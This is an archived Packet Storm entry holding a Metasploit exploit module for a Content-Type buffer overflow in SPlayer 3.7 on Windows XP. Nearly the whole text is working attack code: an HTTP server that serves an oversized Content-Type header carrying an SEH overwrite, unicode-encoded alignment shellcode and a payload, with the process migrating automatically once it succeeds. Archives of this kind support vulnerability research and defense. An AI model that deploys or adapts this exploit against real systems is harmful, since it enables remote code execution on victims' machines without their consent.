SPlayer 3.7 Content-Type Buffer Overflow

2011-05-12T00:00:00
ID PACKETSTORM:101325
Type packetstorm
Reporter sinn3r
Modified 2011-05-12T00:00:00

Description

                                        
                                            `##  
# $Id: splayer_content_type.rb 12582 2011-05-11 11:33:16Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "SPlayer 3.7 Content-Type Buffer Overflow",  
'Description' => %q{  
This module exploits a vulnerability in SPlayer v3.7 or piror. When SPlayer  
requests the URL of a media file (video or audio), it is possible to gain arbitrary  
remote code execution due to a buffer overflow caused by an exceeding length of data  
as the 'Content-Type' parameter.  
},  
'License' => MSF_LICENSE,  
'Version' => "$Revision: 12582 $",  
'Author' =>  
[  
'xsploitedsec <xsploitedsecurity[at]gmail.com>', #Initial discovery, PoC  
'sinn3r', #Metasploit  
],  
'References' =>  
[  
['OSVDB', '72181'],  
['URL', 'http://www.exploit-db.com/exploits/17243/'],  
],  
'Payload' =>  
{  
'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",  
'StackAdjustment' => -3500,  
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,  
'BufferRegister' => 'ECX',  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "seh",  
'InitialAutoRunScript' => 'migrate -f',  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[  
'Windows XP SP2/XP3',  
{  
'Offset' => 2073, #Offset to SEH  
'Ret' => 0x7325, #Unicode P/P/R (splayer.exe)  
'Max' => 30000, #Max buffer size  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => "May 4 2011",  
'DefaultTarget' => 0))  
end  
  
def get_unicode_payload(p)  
encoder = framework.encoders.create("x86/unicode_mixed")  
encoder.datastore.import_options_from_hash( {'BufferRegister'=>'EAX'} )  
unicode_payload = encoder.encode(p, nil, nil, platform)  
return unicode_payload  
end  
  
def on_request_uri(cli, request)  
  
agent = request.headers['User-Agent']  
if agent !~ /Media Player Classic/  
send_not_found(cli)  
print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent")  
return  
end  
  
nop = "\x73"  
  
#MOV EAX,EDI; XOR AL,C3; INC EAX; XOR AL,79; PUSH EAX; POP ECX; JMP SHORT 0x40  
alignment = "\x8b\xc7\x34\xc3\x40\x34\x79\x50\x59\xeb\x40"  
padding = nop*6  
p = get_unicode_payload(alignment + padding + payload.encoded)  
  
sploit = rand_text_alpha(2073)  
sploit << "\x61\x73"  
sploit << "\x25\x73"  
sploit << nop  
sploit << "\x55"  
sploit << nop  
sploit << "\x58"  
sploit << nop  
sploit << "\x05\x19\x11"  
sploit << nop  
sploit << "\x2d\x11\x11"  
sploit << nop  
sploit << "\x50"  
sploit << nop  
sploit << "\x50"  
sploit << nop  
sploit << "\x5f"  
sploit << nop  
sploit << "\xc3"  
sploit << rand_text_alpha(1000)  
sploit << p  
sploit << rand_text_alpha(target['Max']-sploit.length)  
  
print_status("Sending malicious content-type to #{cli.peerhost}:#{cli.peerport}...")  
send_response(cli, '', {'Content-Type'=>sploit})  
  
end  
  
end  
`